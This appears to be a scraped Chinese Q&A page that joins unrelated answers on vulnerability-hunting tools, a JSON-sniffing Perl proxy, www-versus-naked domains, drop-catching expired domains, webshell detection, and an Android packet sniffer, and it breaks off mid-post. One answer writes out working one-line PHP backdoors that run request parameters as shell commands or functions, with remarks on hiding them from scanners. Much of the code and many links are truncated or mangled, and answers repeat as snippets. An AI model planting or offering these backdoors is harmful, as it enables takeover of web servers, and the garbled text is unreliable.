谁有网站注入 脚本小子子常用的工具软件,可以的话分享一下😊
点击联系发帖人
时间:2015-12-23 12:36
善用已有工具,比如awvs ,burp,subdomainburte等等。大牛好像都鄙视工具党,不过如果你只是想高效挖洞或者节省时间,用工具辅助无疑是最佳选择。&br&&br&创造适合自己的小工具,有时候已有的工具满足不了自己的需求,就需要开发适合自己的小工具。比如openssl 心脏出血漏洞,有利用exp了,你可以在这个基础上写个批量对url进行测试的小工具。&br&&br&brup大法好,一个网站从注册到用户中心按照功能,测试一遍。过程就是各种功能都进行抓包,然后针对不同的功能改包测试越权,注入,上传等等。&br&&br&能想到的大概以上几点,挖的多了就能找到偷懒自动化的解决方案了。举个例子:&br&&br&1,自己写个或者去github上找个乌云厂商域名获取工具;&br&2,利用lijiejie大师傅的子域名爆破工具subdomainburte,对获取的所有域名进行批量的子域名爆破;&br&3,利用写好的openssl批量检测工具,对所有的子域名进行测试。&br&&br&都是比较简单的python脚本就能搞定。。然后一觉醒来坐等漏洞。&br&&br&另外用用sebug的框架写点通用的漏洞,它支持对所有url进行批量漏洞的检测,只要你的poc和url足够多。&br&&br&总体来说想高效挖洞,还是得有工具,自己写的或者自己有的,能使用起来挖到漏洞就是靠谱的。
善用已有工具,比如awvs ,burp,subdomainburte等等。大牛好像都鄙视工具党,不过如果你只是想高效挖洞或者节省时间,用工具辅助无疑是最佳选择。创造适合自己的小工具,有时候已有的工具满足不了自己的需求,就需要开发适合自己的小工具。比如openssl 心…
搞点适合自己用的小工具,将时间重复利用。&br&比如说我前些天搞了个小脚本,上班的时候打开,快下班的时候看看,中间在做别的事情。&br&然而,结果颇丰。&br&&br&&div class=&highlight&&&pre&&code class=&language-text&&#!/usr/bin/perl
use Mojo::UserA
use Mojo::Server::D
use Bloom::F
my $bloom_filter = Bloom::Filter-&new( error_rate =& 0.001, capacity =& 100000 );
my $ua = Mojo::UserAgent-&
my $daemon = Mojo::Server::Daemon-&new( listen =& ['http://*:3128'])-&unsubscribe('request');
$daemon-&on(request =& sub {
my ($daemon, $client_tx) = @_;
$ua-&start(Mojo::Transaction::HTTP-&new(req =& $client_tx-&req) =& sub {
my ($ua, $proxy_tx) = @_;
my $response = $proxy_tx-&
$client_tx-&res($response)-&
my $url = $proxy_tx-&req-&url-&to_
if( $url =~ /jsonp|callback/ || defined($response-&headers-&content_type) && $response-&headers-&content_type =~ /json/) {
my $json = $response-&
if( ! $bloom_filter-&check($url.$json) ) {
$bloom_filter-&add($url.$json);
print &$url\n$json\n\n&;
&/code&&/pre&&/div&
搞点适合自己用的小工具,将时间重复利用。比如说我前些天搞了个小脚本,上班的时候打开,快下班的时候看看,中间在做别的事情。然而,结果颇丰。#!/usr/bin/perl
use Mojo::UserA
use Mojo::Server::D
use Bloom::F…
这个问题我琢磨过很久,分享一下心得。&br&&blockquote&1、不加www有哪些好处和坏处?&/blockquote&不加 www 的裸域名好处主要是域名更加简短、容易记忆。坏处就多了,讲几个主要的技术原因:&ul&&li&裸域名只能绑定 DNS 的 A 记录,不能绑定 CNAME 记录。也就是说你不能把裸域设定为另外域名的别名。很多时候这对管理不是很方便,特别是使用第三方托管服务的时候。如果第三方迁移服务器导致 IP 地址变更,你必须自己去更改 DNS 的 A 记录。&br&&br&比如你的个人博客采用 Tumblr 的服务,如果使用裸域,你需要手动将你域名的 A 地址指向 Tumblr 指定的 IP 地址。Tumblr 如果迁移了机房,所有通过这种方式设定个人域名的用户都必须更改自己的 DNS 才能继续使用,否则服务就会中断。使用子域名的 CNAME 记录就相对简单很多,只需要将 www 子域名的 CNAME 字段指向 &a href=&///?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& 这个域名,之后如果 Tumblr 更改 IP 地址,他们只需要重新设置 &a href=&///?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& 这个域名的 A 记录,而无需要求每个用户去更改 DNS 记录。&br&&br&这个技术上的限制导致许多大型的第三方服务商不支持使用裸域。典型的如 Google 的服务,现在都不能使用裸域。Google 的服务用户基数大,不得不采用 DNS 级别的分布式,使用到的 IP 地址太多,而且变动大。让用户绑定 A 记录的话不利于负载均衡,维护起来也是几乎不可能完成的任务。同理,大部分 CDN 也不支持裸域。&/li&&li&裸域的 cookie 的作用范围太大。假如知乎也采用裸域,那么知乎所有 cookie 的作用范围就包括 &a href=&& class=&internal&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&/a& 下的所有子域名。也就是说访问 &a href=&& class=&internal&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&/a& 和 &a href=&& class=&internal&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&/a& 的时候都会带上 &a href=&& class=&internal&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&/a& 裸域页面设置的 cookie。从安全、隐私、可扩展性、以及管理的角度而言,这对很多大型网站来说是不可接受的。&/li&&li&URL 的正则匹配,如果带 www 前缀的并且以 .com/.net/.org 结尾的,通常成功的机会要大很多。这个你会在许多文本编辑器里面遇到。如果 URL 不是 www 开头,并且也不是三大顶级域名结尾的,匹配成功的概率就要小很多。这是使用过程中有时候会让人很抓狂的点,重不重要全看你的用途和场合了。&/li&&/ul&&br&另外一点非技术上的考量:用 www 子域名的好处体现在线下的环境,比如户外广告、报纸杂志、语音广播、语音电话等使用场合,www 这个前缀(不管是视觉的还是听觉的)能够很明确的提醒受众,这个信息片段是一个网站。有人会说加上 http:// 前缀也能解决这个问题,但现在随着以 Chrome/Safari 为首的浏览器都开始在地址栏里隐藏 http:// 协议前缀了,普通用户对于 http:// 这几个字符的理解会越来越模糊,所以如果是线下的话,保留 www 这个 visual/vocal cue 还是有一定意义的。&br&&br&总的来说对于大访问量或多子域名的网站来说,不建议使用裸域。小流量或子域名少的网站的话就看个人爱好了。我挺喜欢裸域的。最近几年流行起来的「单页网页应用」(Single Page Web App) 也是以采用裸域的居多,Twitter
算是一例。&br&&br&&blockquote&2、去掉www是否会影响网站的SEO(主要是排名和收录)?(前提是过去有加www)&/blockquote&早先裸域刚开始流行的时候确实有传闻说不利于 SEO,但现在看来似乎并无任何问题。如果有的话也是搜索引擎的 bug,给他们提一下他们应该会很乐意去改。Google 的站长工具里面有工具可以帮助你做 URL 迁移的,可以有效的解决这个问题,再配合下一部分的跳转,不用担心对 SEO 有任何负面影响。&br&&blockquote&3、用什么方式去跳转最好?(如301)&/blockquote&不管你决定使用还是不使用裸域,最好不要在同时保留 www 前缀和裸域的 URL,这样既不方便用户的浏览器区分访问历史,也会对你做访问统计带来不少麻烦。最佳的方式是采用 301 跳转,并且跳转的时候保留 URL 里域名后的全部内容。比如,如果你决定使用裸域 ,那么请务必将 &br&
/foo/bar?spam=egg &br&301 跳转到 &br&
/foo/bar?spam=egg &br&去。或者反过来,如果你决定不使用裸域,那么请务必将&br&
/foo/bar?spam=egg &br&301 跳转到&br&
/foo/bar?spam=egg &br&&br&这样的跳转需要在 web 服务器里单独配置,很多 DNS 管理界面提供的简单的跳转到新域名的根目录无法实现这样的功能(仅仅跳到 / ),对用户体验和搜索引擎 SEO 而言都是非常糟糕的。&br&&br&下面给出如何在 nginx 里面实现上述的跳转:&div class=&highlight&&&pre&&code class=&language-nginx&&&span class=&c1&&# redirect http(s):// to http(s)://&/span&
&span class=&k&&server&/span& &span class=&p&&{&/span&
&span class=&kn&&server_name&/span& &span class=&s&&&/span&&span class=&p&&;&/span&
&span class=&kn&&return&/span& &span class=&mi&&301&/span& &span class=&nv&&$scheme://$request_uri&/span&&span class=&p&&;&/span&
&span class=&p&&}&/span&
&span class=&c1&&# redirect http(s):// to http(s)://&/span&
&span class=&k&&server&/span& &span class=&p&&{&/span&
&span class=&kn&&server_name&/span& &span class=&s&&&/span&&span class=&p&&;&/span&
&span class=&kn&&return&/span& &span class=&mi&&301&/span& &span class=&nv&&$scheme://www.$host$request_uri&/span&&span class=&p&&;&/span&
&span class=&p&&}&/span&
&/code&&/pre&&/div&
这个问题我琢磨过很久,分享一下心得。1、不加www有哪些好处和坏处?不加 www 的裸域名好处主要是域名更加简短、容易记忆。坏处就多了,讲几个主要的技术原因:裸域名只能绑定 DNS 的 A 记录,不能绑定 CNAME 记录。也就是说你不能把裸域设定为另外域名的别…
作为安全界的人。当然要推荐下libmproxy了。
作为安全界的人。当然要推荐下libmproxy了。
因为个人兴趣, 简单做过一些域名抢注方面的事情,
分 初级, 中级, 高级三个部分说一下, 希望大家都能有所得.&br&&br&&b&### 初级.
怎么注册刚过期域名 ###&/b&&br&&br&&b&1. 查看具体删除时间:&/b&&ul&&li&某域名过期/删除时间查询: &a href=&///?target=http%3A///DomainDel& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&域名删除时间查询&i class=&icon-external&&&/i&&/a&&/li&&li&最近可抢注域名查询 (国际): &a href=&///?target=http%3A///viewlist.aspx& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&& : Pending Delete List&i class=&icon-external&&&/i&&/a&&br&&/li&&li&最近可抢注域名查询 (国内): &a href=&///?target=http%3A///book/expiredendomainlist& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&易名:过期域名预订列表&i class=&icon-external&&&/i&&/a&&/li&&/ul&&b&2.
预订抢注. &/b&&br&&ul&&li& 国内域名抢注: 去 ename,
等申请抢注&br&&/li&&ul&&li&好处是比较便宜,
国内域名成功较高,
国际域名成功较低, 并非很好的域名, 可以在此预订&/li&&/ul&&li& 国外域名抢注: 去 3个国外域名网站抢注: namejet, pool, snapnames &br&&/li&&ul&&li&好处是国际域名成功率高, 另外还有一些把抢注作为副业的注册商 name, godaddy 等也可以尝试一下.&/li&&/ul&&li& 品相不太好或只有你自己能理解意思的域名:
选择一家可信且相熟的机构,肉身自由发挥即可.&/li&&ul&&li&国内域名删除时间:
4点30 (北京时间)&/li&&li&国际域名删除时间:
2点~4点 (北京时间)&/li&&li&国内比较可信的服务商: &a href=&///?target=http%3A///ggfw/hyzl/yxymzcfwjghdljgtj/59.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&2012年度注册服务机构服务水平评定结果&i class=&icon-external&&&/i&&/a&&/li&&/ul&&/ul&&b&3.
竞价&/b&&br&&ul&&li& 上面的只是预订,
好域名一般不止一个人盯上,
这时就要时刻盯着最终竞价的结果,
每家注册商竞价的规则不同, 但大部分都是到竞价快结束时, 如有出价,会再将结束时间延长一些这样, 就不展开说了. &/li&&/ul&&br&&b&### 中级,
为什么这样注册过期域名 ###&/b&&br&&br&想要详细了解过期域名注册的信息及过程, 需要提前做一些功课:&br&&br&&b&1. 域名生态周期 &/b&&br&
其他同学的回答里也提到了,
域名有很多种状态,
和抢注有关的有以下四种:&br&&img src=&/2c1a09290ab6cbc3c77acef372afb933_b.jpg& data-rawwidth=&500& data-rawheight=&500& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&/2c1a09290ab6cbc3c77acef372afb933_r.jpg&&&br&&ul&&li&活动状态 : 就是正在使用的,
如果你想要这个域名, 那要好好盯着 whois里面的过期时间..
年复一年.&/li&&li&保留状态 : 已经到了过期时间,
但还在注册商手中,
这时候可以进行续费, 并且没有额外的费用, 具体的时间需要看注册商的实力以及和 ICANN的关系, 越大的注册商一般这个期限可以留的越长.
一般是30天.
&/li&&ul&&li&例如 你在 日注册的域名,
日域名过期了,
日~ 日 你可以对域名进行续费, 并且不用多交钱. 前提是你选择的注册商还不错, 拿到了30天的赎回期域名保留权.&/li&&/ul&&br&&li&赎回状态:
如果很不幸,
没赶得及在保留状态续费域名,
域名会改变状态为 &赎回等待&.
这时候就需要多交钱才能重新得到域名所有权,
在这个状态的域名已经一只脚踏进了坟墓, 因为价格昂贵,不是很好的域名一般都会选择放弃.
ICANN 给出每次执行EPP命令的价格 是 40美元 ( 赎回也是EPP命令之一 ), 至于注册商给用户要多少钱就是他的事了, 一般有良心注册商的给的价格会是注册价格的10倍左右. 这是域名删除期的第一个阶段. &/li&&br&&li&等待删除状态:
这时候注册商的什么操作都不管用了,
老老实实等删除吧.
这是域名删除期的第二个阶段 ( 最后一个阶段是
咔嚓.. 删了. ). &/li&&br&&li&Pre-Relase 状态:
咦? 不是相关的是四种状态吗? pre-release状态怎么冒出来的?
这个状态其实是注册商 &私设& 的一个状态 ( 为了准确, 我翻了很多 ICANN 公布的档案和协议, 的确没有任何地方出现这个状态 ) . 但是 ICANN 并没有对其做出反应, 现在成了一个约定俗成的东西,被大家所接受。
那么 注册商为什么要设置这样一个状态, 它有什么用哪? &/li&&ul&&li&其实是注册商的把戏,归根结低还是为了多赚钱. &/li&&li&当一个还不错的域名经过了保留状态,
进入赎回期之时,
注册商觉得 这个傻小子现在还没续费, 应该不会再续费这个域名了,
这么个域名直接交给ICANN 删掉太可惜了, 自己什么也得不到, 怎么办哪?&/li&&li&贴心的几大抢注巨头出现了, 说你可以把域名让我来竞拍, 如果拍出去了 最后傻小子也没续费,
我分一部分钱给你.
如果拍出去了, 傻小子忽然肯花高价续费了, 那就再还给傻小子, 至于那些竞拍的人,道个歉就是,
你也能赚个赎回的差价.
注册商一听, 感觉不错, 自己怎么着都有钱拿, 于是pre-release 状态就这么产生了. &/li&&li&pre-release 状态严格来说属于赎回期,
所以域名所有者可进行高价续费,
但由于也在抢注巨头手中, 所以大家也可以去和注册商有协议的抢注商那里预订和竞价. &/li&&li&目前我只在 namejet 和 snapnames 两家见到过这种状态的域名.&/li&&li&我在上面吃过大亏.&/li&&/ul&&/ul&&b&2. 域名的将死之日&/b&&br&&ul&&li&一个正常的&域名轮回时长&是:
域名使用时间
续费时间 + 赎回时间 +
准备删除时间&/li&&li&这个时长会被注册商用各种手段来打破,
ICANN 对注册商有各种政策, 其中一条是 在域名付费5天内可随时撤销, 在付费5天以上30天内 可申请撤销,
所以很多注册商在域名过期之时会先续费一年, 如果在删除期到达之时还没有人高价赎回, 同同时又没有抢注商找他们洽谈, 自己又看不上这个域名的话, 才扔给 ICANN 回炉. 如果满足上面任意一点, 这个流程就会被打破.
类似的手段应该还有不少. &/li&&li&值得庆幸, 大部分域名的轮回时长还是遵守上面流程的.
&/li&&/ul&好吧, 里面这么多道道, 到底域名真正被删除的时间是多少哪?
我们的肉身什么时候才可以参与抢注? 其实对于我们, 不用想那么多, 这些我们只要了解就行了, 做好真正删除时间和自己心里预估时间不一致的准备, 看着下面几个地方等着即可,
&br&&ul&&li&找到域名所属的注册商, 了解域名注册商拿到的政策 ( 域名保留期的时长. )&/li&&li&紧盯域名的状态 &/li&&li&紧盯ICANN公布的近期要删除域名列表 &/li&&li&紧盯代注商公布的可抢注列表&/li&&/ul&&b&3. 你的对手&/b&&br&一般情况下, 如果不是肉身亲自上阵,
你的对手分为两个阶段:
抢注阶段 和 竞价阶段. &br&&ul&&li&
抢注阶段 :
一个稍微好点的域名, 选择一个或几个合适的代注商绝对是有必要的,
域名界也有28原则 甚至更高,
每年优质域名的80% ~ 90% 都被 10% ~ 20%的抢注巨头抢到,
那么怎么选择哪?
我的原则是好域名全网预订,
稍好域名看关系,
比如enom 和 namejet 本来就是一家,
enom 本身挂的抢注平台就是 namejet , 所以 enom 想卖点pre-release 的域名就会挂在 namejet 上, 如果你想抢这个域名, 那么在namejet上提前预订, 变数对你来说就会小很多,
这种技巧会帮你淘汰一批对手 ( 一般来说好点的域名还是要全网预订的,
很多网站只要押金 或填个信用卡号, 只预订抢注不成功也不交钱 ). &/li&&li&
竞价阶段 :
这个和传统拍卖很类似,
并且更熬人,
因为大部分的竞价都要持续3天以上,
并且我上面也提到, 越接近结束时间竞争越激烈, 可恨的是 注册商都会使用这一招, 当竞价接近结束时间时, 自动加一段时间.. 让好域名总会到达一个让他们满意的价格 而杜绝了人们想在最后一刻加价的投机心理.
注册商的另外一个手段是闯入竞价,
可以让一些最早没有参加抢注的人缴纳一部分&闯入费&
如果最终竞价成功, 闯入费退换,
竞价失败, 闯入费不退.
所以每个闯入者都可认为是对域名志在必得的人 价格也就会更高. &/li&&li&
给自己设定心里价位, 理性一点, 因为最终竞拍价格超过域名当前所值价格的例子有太多. &/li&&/ul&&br&&b&### 高级,
更多的知识及提高成功率 ###&/b&&br&&br&&b&1. 更多的知识&/b&&br&
上面我无数次的提到了 ICANN ,
它是干什么的哪?
从1985年第一个域名&a href=&///?target=http%3A//nordu.net& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&nordu.net&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&算起,
域名出现已经 28年了,
在1992年之前, 域名注册免费, 直到 1993年 NSI 和美国政府签合同, 独家代理com, net, org 三个顶级通用域名, 才被NSI以每年100美元的价格收取费用, 1997年之后 NSI 每年卖域名的收益就达到近2亿美元,
美国政府觉得不能这么搞了,
垄断的太彻底.
并且接触互联网比较早的朋友应该都记得, 1998年的时候, 有大量关于域名被抢注, 申请申诉, 仲裁的新闻, 另NSI深陷其中. 再加上世界其他国家对于美国一家公司来管理这些全球性通用域名很不满意。
所以美国政府在1998年解除了与 NSI的合同, 并成非盈利组织 ICANN 来替代 IANA的职责 , 管理网络资源.
2009年 ICANN 独立于美国政府管辖之外, 真正成为国际组织. &br&&br&ICANN 主要管理 四件事,
通用顶级域名及国家和地区顶级域名, dns 根服务器. 在ICANN 开始管理域名之前,
对于域名过期的时间是有些混乱的, 除了规定到期60天之内可以继续续费之外,
并没有透明化过期时间, 完全NSI自己说了算 (我的观点来源于当时论坛上的帖子: &a href=&///?target=http%3A//ask.slashdot.org/story/00/06/16/1941232/what-should-happen-to-expired-domains& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&What Should Happen To Expired Domains?&i class=&icon-external&&&/i&&/a& 和 IDG的新闻: &a href=&///?target=http%3A///article/32805/article.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&NSI Faces Domain Name &Hoarding& Suit&i class=&icon-external&&&/i&&/a&
关于过期60天可续费的说明 参见 &a href=&///?target=http%3A///alan/articles/domain2a.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&A Site By Any Other Name: Domain Name Issues for Canadian Organizations&i class=&icon-external&&&/i&&/a& 文章中对NSI 的描述 ) , ICANN接手之后好了很多。&br&&br&ICANN 对于域名过期做出的一些工作如下:&br&&ul&&li&1999年 招标第一批通用顶级域名注册商5位, 引入公平竞争机制,
令通用顶级域名价格下降 (抢注价格也下降):
&a href=&///?target=http%3A//www.icann.org/zh/resources/registrars/accreditation/policy-statement& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&注册商委任政策声明&i class=&icon-external&&&/i&&/a&&/li&&li& 2001 年,
和注册商的协议中规定,
注册商在域名过期后必须给注册人留有时间来赎回. &/li&&li& 2004 年,
制定过期域名删除政策&/li&&li& 2008 年,
再次明确注册人在域名过期后需有足够的时候将域名恢复: &a href=&///?target=http%3A//www.icann.org/zh/resources/policy/background/domain-name-recovery& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&过期域名恢复&i class=&icon-external&&&/i&&/a&&/li&&/ul&&br&&b&2. 抢注巨头们为什么成功率很高.&/b&&br&&br&
如果大家可以用技术的思维想一下,
就不难明白, 每当域名被删除的瞬间,
其实就是数据库里一条数据的清空, 主键是域名,
那怎样才能在它清空时快速的插入一条同主键的新信息哪?
其实无非就是早早的准备好数据, 然后用高并发和快速的响应速度把这条数据向里面塞过去, 成功塞入你就抢到了, 没有成功,就被别人抢先, 而这些抢注商的做法也是这样.&br&&br&&ul&&li&充足的接口,
ICANN 的认证注册商只有不到1千, 也就是只有1千个接口, 而 namejet 和 snapnames 都有上百的注册接口 , 而其他公司 包括国内的公司 只有一到两个,
这是这些大的抢注商成功率高的最主要原因.
我们国内全部公司加起来才只有不到50条接口, 还不如他们一个公司的接口多.
&/li&&li&极快的速度,
在美国的抢注商有个很好的优势:
离域名数据库比较近,
你可能觉得只不过减少了几跳,
十几到几十毫秒而已,
这些时间就够他们多抢到很多域名了. &/li&&/ul&&b&&br&3. 个人怎么提高抢注成功率&/b&&br&&br&
啊, 可是我实在不想多花钱让抢注商帮忙注册, 更不想和别人竞价,
这样我会损失很多成本. 我想凭自己的本事抢到好域名, 难道不可以吗?
可以, 当然可以!
不过要用一些技术手段来支持, 纯肉身抢注者以前或许还能成功, 现在已经有些不行了. &br&&br&
个人抢注也还是有一些优势的, 因为每天过期的域名数何其多,
每天被预订的过期域名也是成千上万,
抢注商接口数虽然多 但也有限,
要抢注的域名也需要放在一个个队列里,
一个一个的拿出来向verisign 发起抢注请求 ( VeriSign 除了给网站提供可信证书业务外, 也是ICANN授权管理 .net .com 域名的机构 )
这样, 就有了一个时间差,
再加上每个域名过期的时间并非绝对的准点, 所以, 我们只瞄准几个域名, 把握的好还是有一些机会的.
&br&&ul&&li&选择好域名注册商,
一定要从ICANN 公布的有通用国际域名注册资质的注册商名单里选,
另外为了减少延迟, 这个注册商最好在美国, 并且最好多选几个&/li&&li& VeriSign 的ip地址为 69.58.181.89, 位置大概在美国的东海岸, 华盛顿附近,
不确定它所管理的通用国际域名的数据库具体是不是也在这个地方, 我个人觉得应该差不多.
所以, 你选择的注册商所在的机房 最好能离这里近一些, 或者 traceroute 一下看看中间跳过的节点数和速度.&/li&&li&准备好自己的注册信息, 准备好并发脚本, 保证自己脚本所在机器和注册商服务器之间延迟不要太大, 在预定过期时间之前1~ 2分钟, 开始向选定的各个注册商发起请求,
一直到这个域名的whois 请求改变... 小心被封&/li&&li&多摸索几次就知道要选哪些注册商,
脚本的速度如何了. &/li&&li&另外, 自己的注册信息要尽量的少, 可以减少几个字节,
加快速度 这是在看蔡文胜老师的访谈时 发现的 :p &/li&&li&如果真想做这一行,
有机会, 可以尝试通过 ICANN 和 VeriSign 的注册商认证,
有了自己的通道, 成功率会高很多,
去年ICANN 在招标新顶级域名时曾透漏过想放开域名注册的限制,
可能认证会松一些, 正是一个可以尝试的机会.&/li&&/ul&&br&###
###&br&ICANN 过期域名删除政策(040912): &a href=&///?target=http%3A//archive.icann.org/en/registrars/eddp-21sep04-enp.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&ICANN | Archives| Expired Domain Deletion Policy&i class=&icon-external&&&/i&&/a&&br&ICANN 与 verisign 达成的注册协议.pdf: &a href=&///?target=http%3A//www.icann.org/en/resources/registries/rsep/verisign-request-redemption-grace-period-20mar12-en.pdf& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&ICANN Registry request Service&i class=&icon-external&&&/i&&/a&&br&ICANN 99年对 NSI 的授权和协议: &a href=&///?target=http%3A//archive.icann.org/en/nsi/nsi-rla-04nov99.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&ICANN | NSI-Registrar License and Agreement&i class=&icon-external&&&/i&&/a&&br&ICANN FAQ, 域名删除还没有确定的方案: &a href=&///?target=http%3A//www.icann.org/en/about/learning/faqs& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&FAQs | ICANN&i class=&icon-external&&&/i&&/a&&br&ICANN 认定有通用国际域名注册资质的注册商列表: &a href=&///?target=http%3A//www.icann.org/registrar-reports/accredited-list.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&ICANN | ICANN-Accredited Registrars&i class=&icon-external&&&/i&&/a&&br&怎么买过期域名(提及了pre-release) : &a href=&///?target=http%3A///blog/domain-names/how-buy-expired-domain-name& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&How To Buy An Expired Domain Name&i class=&icon-external&&&/i&&/a&&br&域名历史,注册方法及其他介绍: &a href=&///?target=http%3A///domain-name-registration-and-major-registrars.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Domain Name Registration and Major Registrars&i class=&icon-external&&&/i&&/a&&br&CNBeta 域名发展史: &a href=&///?target=http%3A///articles/201279.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&[信息图]域名发展史&i class=&icon-external&&&/i&&/a&&br&蔡文胜创业家访谈: &a href=&///?target=http%3A//.cn/i//.shtml& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&站长之王蔡文胜:市场成熟后将进军域名停放&i class=&icon-external&&&/i&&/a&&br&NSI时期域名争议策略: &a href=&///?target=http%3A//.cn/GB/channel5/28/64.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&美国NSI公司《域名争议政策》&i class=&icon-external&&&/i&&/a&&br&&br&PS: 已在文章中加入的链接 并未在此注明&br&&br&####&br&&br&至此, 欢迎补充和指出错误.
因为个人兴趣, 简单做过一些域名抢注方面的事情, 分 初级, 中级, 高级三个部分说一下, 希望大家都能有所得.### 初级. 怎么注册刚过期域名 ###1. 查看具体删除时间:某域名过期/删除时间查询: 最近可抢注域名查询 (国际):
这一点也谈不上新奇,也谈不上是我见过的最变态的PHP后门。&br&&br&如果有服务器权限,可以扫描文件的话(作为管理员没道理不行吧?),这类后门会被一类使用统计方法(计算包括信息熵、&a class=& wrap external& href=&///?target=http%3A//en.wikipedia.org/wiki/Index_of_coincidence& target=&_blank& rel=&nofollow noreferrer&&Index of Coincidence&i class=&icon-external&&&/i&&/a&在内的一系列统计指标)的检测工具直接干爆。给一个很简单的例子:&a class=& wrap external& href=&///?target=https%3A///Neohapsis/NeoPI& target=&_blank& rel=&nofollow noreferrer&&Neohapsis/NeoPI · GitHub&i class=&icon-external&&&/i&&/a&&br&&br&使用这个Python脚本检查这个文件:&br&&div class=&highlight&&&pre&&code class=&language-text&&[[ Average IC for Search ]]
[[ Top 10 lowest IC files ]]
./test/test.php
[[ Top 10 entropic files for a given search ]]
./test/test.php
[[ Top 10 longest word files ]]
./test/test.php
[[ Top 10 signature match counts ]]
./test/test.php
[[ Top 10 SUPER-signature match counts (These are usually bad!) ]]
./test/test.php
[[ Top cumulative ranked files ]]
./test/test.php
&/code&&/pre&&/div&&br&单独扫描可能看不出什么,但是把它放在一个PHP框架里,你就会发现这个文件肯定位列前几名,尤其是entropy和IC两个项目。&br&&br&这个脚本还算比较简单的,但已经堪用了,再配合上一些基于指纹数据库的扫描器,一般很难有漏网之鱼了。我相信,更强大一些的扫描器都是会综合使用数据库和统计方法的。&br&&br&最后,更可靠的方法当然还是文件监视和版本控制了。
这一点也谈不上新奇,也谈不上是我见过的最变态的PHP后门。如果有服务器权限,可以扫描文件的话(作为管理员没道理不行吧?),这类后门会被一类使用统计方法(计算包括信息熵、在内的一系列统计指标)的检测工具直接干爆。给一个很简…
作为一个看了一年后门的人,已经能分清一句话是公是母了,这种马确实不太奇怪,&br&我觉得比较有意思的一句话后门有&br&&?php &br&echo `$_GET['id']` //插在文件中比较难发现&br&?&&br&&div class=&highlight&&&pre&&code class=&language-php&&&span class=&cp&&&?php&/span& &span class=&p&&(&/span&&span class=&nv&&$_&/span&&span class=&o&&=&/span&&span class=&nv&&$I&/span&&span class=&o&&.&/span&&span class=&nv&&$_GET&/span&&span class=&p&&[&/span&&span class=&mi&&3&/span&&span class=&p&&])&/span&&span class=&o&&.&/span&&span class=&nv&&$_&/span&&span class=&p&&(&/span&&span class=&nv&&$I&/span&&span class=&o&&.&/span&&span class=&nv&&$_POST&/span&&span class=&p&&[&/span&&span class=&mi&&4&/span&&span class=&p&&])&/span&&span class=&cp&&?&&/span&&span class=&x&& 据说PKAV大牛最近写了个生成这种后门的网页&/span&
&span class=&cp&&&?php&/span& &span class=&nv&&$_POST&/span&&span class=&p&&[&/span&&span class=&s1&&'s'&/span&&span class=&p&&](&/span&&span class=&nv&&$_POST&/span&&span class=&p&&[&/span&&span class=&s1&&'cmd'&/span&&span class=&p&&]);&/span&&span class=&c1&&//躲避函数名查杀&/span&
&span class=&cp&&?&&/span&&span class=&x&&&/span&
&span class=&x&&还有用inlude调用图片的马&/span&
&/code&&/pre&&/div&
作为一个看了一年后门的人,已经能分清一句话是公是母了,这种马确实不太奇怪,我觉得比较有意思的一句话后门有&?php echo `$_GET['id']` //插在文件中比较难发现?&&?php ($_=$I.$_GET[3]).$_($I.$_POST[4])?& 据说PKAV大牛最近写了个生成这种后门的网页
谢谢 &a data-title=&@bystander& data-editable=&true& class=&member_mention& href=&///people/5ed7bd27ceb96cfda22409& data-hash=&5ed7bd27ceb96cfda22409& data-tip=&p$b$5ed7bd27ceb96cfda22409&&@bystander&/a&、 &a class=&member_mention& href=&///people/413df232fd0e85e2bbf792c956a94b65& data-hash=&413df232fd0e85e2bbf792c956a94b65& data-tip=&p$b$413df232fd0e85e2bbf792c956a94b65&&@徐仙明&/a&
、 &a class=&member_mention& href=&///people/7daac46c75d7cac1e7d2& data-hash=&7daac46c75d7cac1e7d2& data-tip=&p$b$7daac46c75d7cac1e7d2&&@朱焕杰&/a& 和其他朋友的帮助,Wi.cap. Network sniffer Pro要付费,所以在国内无法下载,DEMO版的运行正常,但看不到数据内容。在网上找到用了D版(&a class=& wrap external& href=&///?target=http%3A///android--1.html& target=&_blank& rel=&nofollow noreferrer&&【G软件】网络数据包嗅探器Wi.cap. Network sniffer Pro v1.2.8已付费)&i class=&icon-external&&&/i&&/a&结果总是显示需要至少验证一次授权,仍然不能使用(如果是我使用错误,请指正)&br&&br&最后使用了&a class=& wrap external& href=&///?target=http%3A///apps/blake.hamilton.bitshark& target=&_blank& rel=&nofollow noreferrer&&「比特鲨
